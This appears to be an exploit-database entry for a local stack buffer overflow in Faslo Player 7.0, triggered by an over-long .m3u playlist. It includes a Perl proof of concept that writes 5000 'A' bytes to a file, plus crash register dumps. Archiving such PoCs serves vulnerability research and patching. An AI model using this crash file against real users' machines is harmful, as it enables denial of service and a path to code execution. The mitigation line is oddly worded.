header-logo
Suggest Exploit
vendor:
Faslo Player
by:
HACK4LOVE
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Faslo Player
Affected Version From: 7.0
Affected Version To: 7.0
Patch Exists: YES
Related CWE: N/A
CPE: a:faslo:faslo_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Faslo Player 7.0 (.m3u) Local Buffer Overflow PoC

Faslo Player 7.0 is vulnerable to a local buffer overflow vulnerability when a specially crafted .m3u file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .m3u file. The vulnerability is caused due to a boundary error within the application when processing the file. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted .m3u file with an overly long string.

Mitigation:

Upgrade to the latest version of Faslo Player 7.0 or later.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# hack4love@hotmail.com
# Faslo Player 7.0 (.m3u) Local Buffer Overflow PoC
# http://www.rspq.org/faslo/fs7setup.exe
############################################################
##EAX 41414141
##ECX 004A7CB0 faslow.004A7CB0
##EDX 00145920
##EBX 00000000
##ESP 0012F5B0
##EBP 0012FC84
##ESI 003F9BC9
##EDI 003F9BC9
##EIP 73DD526E MFC42.73DD526E
#############################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
##############################################################

# milw0rm.com [2009-08-24]